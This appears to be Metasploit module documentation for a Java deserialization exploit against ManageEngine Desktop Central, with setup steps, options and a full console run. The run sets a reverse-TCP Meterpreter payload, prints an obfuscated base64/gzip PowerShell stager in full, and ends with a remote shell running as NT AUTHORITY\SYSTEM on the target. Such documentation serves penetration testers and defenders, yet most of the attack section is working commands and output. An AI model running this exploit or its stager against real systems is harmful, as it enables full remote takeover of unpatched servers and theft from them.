William Vu
5.7 KiB
5.7 KiB
Vulnerable Application
Description
This module exploits a Java deserialization vulnerability in the
getChartImage() method from the FileStorage class within ManageEngine
Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.
The short-term fix for the arbitrary file upload vulnerability was released in build 10.0.474 on January 20, 2020. In continuation of that, the complete fix for the remote code execution vulnerability is now available in build 10.0.479.
Setup
- Download a vulnerable installer (I used 10.0.465 x64)
- Install the software in Windows (I used Windows 10)
Targets
Id Name
-- ----
0 Windows Command
1 Windows Dropper
2 PowerShell Stager
Verification Steps
Options
WfsDelay
If the target is slow to shell, increase this value. The default is 60 seconds, on a fresh install and calibrated to my test environment.
Scenarios
Desktop Central 10.0.465 x64 on Windows 10
msf5 > use exploit/windows/http/desktopcentral_deserialization
msf5 exploit(windows/http/desktopcentral_deserialization) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/http/desktopcentral_deserialization) > show missing
Module options (exploit/windows/http/desktopcentral_deserialization):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
msf5 exploit(windows/http/desktopcentral_deserialization) > set rhosts 172.16.249.139
rhosts => 172.16.249.139
msf5 exploit(windows/http/desktopcentral_deserialization) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(windows/http/desktopcentral_deserialization) > run
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Detected Desktop Central version 100465
[+] The target appears to be vulnerable. 100465 is an exploitable version
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
[*] Powershell command length: 2502
[*] Serializing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAImual4CA7VWa2+bSBT9nEj5D6iyBCiOjV0nTSNV2gFDjGu7psSP2GutCAww8QAuDLFJt/9979iQptt0t11pERLzuM9zz8zFz2OXkSQWEuuy/Ub4fHJ8NHZSJxKk2pr6al4XarkiHx3Beu1+aAbCO0Faos2mm0QOiVdXV1qepjhmh3njGjOUZTi6owRnkiz8KcxCnOKzD3f32GXCZ6H2R+OaJncOLcUKzXFDLJyh2ON7g8R1eDgNe0MJk8Tffxfl5Vlr1dA/5Q7NJNEuMoajhkepKAtfZO7wpthgSRwSN02yxGeNGYlftxuTOHN8PAJrD3iIWZh4mShDFvCmmOVpLOzz4QYO25IIw3GauMjzUpxlYl1YctPL1eo3aVn6/ZjHjES4YcYMp8nGxukDcXHW6DmxR/FH7K9Ay2YpiYOVLIPYQ7LGUi3OKa0Lv2JGGuFthdrPKknPlUBqzFK5DoV8Ic9h4uUUHzTFFwI9FF+G50AAQO7LyfHJsV/RxX2rec/ZAqOj5X6MITppnGRkL/dOUOrCEPw4LEkLmNZu0hzLqydshVrkTOs/Vm9VslyyVzzC0nKaEG8FKmU9a87FoMvXf8zLLvZJjLtF7ETEragnvQQy9inep9ioxEYQlCSWG9jrYooDh3HYeK2/U9Mjwp501ZxQD6fIhUJlEBXUUP42mEMlJNGMhzgCiA5zIF/NB8LjSrokeVF553MQEjXqZFldGOdw4ty6YGOHYq8uoDgj5RbKWbIfil/DHeaUEdfJWGVuJVc4lv60JM5YmrtQNcj9xt5glziUQ1EXesTDamGToPIrvgiE5lAK5wAsPUAhYIUDYDPOhRRC5HWXGzZmZrShOAKR/ck3qBPAOS/JvueOE2BP/HuAFZkPzOVQVBg8Cw/qa9OE1YUpSRlcIBxWTqL/5P3ZzbGPQ0txWQipOh5LtWCc1LUd4nwsMdkjkDLI3kiTSHUyfNE53BHSq6ZOuufjbvKI4NGNj9ZUtSfThTn0+tQ2mX2rk8EkDE3SMgOYFxM9GDNl8/7mpte3uz2Udnehj8zM1HtqYbVU5PbIm2lfnUxAj2gD635nIk+Ngnlwq23NcTg3wZE2CMwAvqoZuqqyUAJVMbSBrYY6UVBgWz2r01qYzUuqkkfbtFFv9uTvyY/e6fTmuxs0GvZRaHzwjFbb2Ouvuf5ifT3o6vu5y+fWbaYTHfzoxq01DfFsulFnurGwphszON0G1nTQ7BihCusm2Q02dhOeVqv/EHuPQ3r5OIRwremiT/DCDHARIAsh+zam9t1WQ6rhpmr3HE2MCaytb8x4Z91thl5x22u+nQ4J3iTI0hEyKJzHCDnbbrM1S95b03Nroiu7YqLstvp9c6uT/nZdfifXFxdB0++Mm1PbjHtOqEK8Rb+zJv1T2AP6KLd+c8rx6+px8zGeU2estRJ612xNSPeNqpoE90dDl35SIWewcW7dJVrbDX2IyQwurWCexG1nDXZnAYLoID+os983QUfNKVlPTufcVn+rRP2dwuOM+pcQW7uMAbHYnDchPtTr2lp8bZvztocNtXnqvnvFGQuUrRV09IyKP+ohQyfNQocCRaE5VJeCkaRGed+PE8I1JOnwm7DGaYwpdFnow9XZQpQmLu83+9YAve7QgXhDnMDwdfvFkSw8Ccpf+1C1dHW1gDDhtO5QY4DjgIV1ZfdaUaCnKLuOAjn+fGJasikkMFTnHYnDcjBL92Zlfnpr6eye/M9glZdGCB/v38D6uvYPuz8FoFLfJ/zd6rcLvwTnr6c+cwgDURvuPYoPXfdlBEpmPPst4YWByvvlw/8rP+TsbAR/KyfHfwHyG93zwwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[*] Uploading serialized payload
[+] Successfully uploaded serialized payload
[*] Deserializing payload
[+] Successfully deserialized payload
[*] Sending stage (206403 bytes) to 172.16.249.139
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.139:50055) at 2020-03-12 16:51:07 -0500
[!] This exploit may require manual cleanup of '..\webapps\DesktopCentral\_chart\logger.zip' on the target
meterpreter >
[+] Deleted ..\webapps\DesktopCentral\_chart\logger.zip
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows 10 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >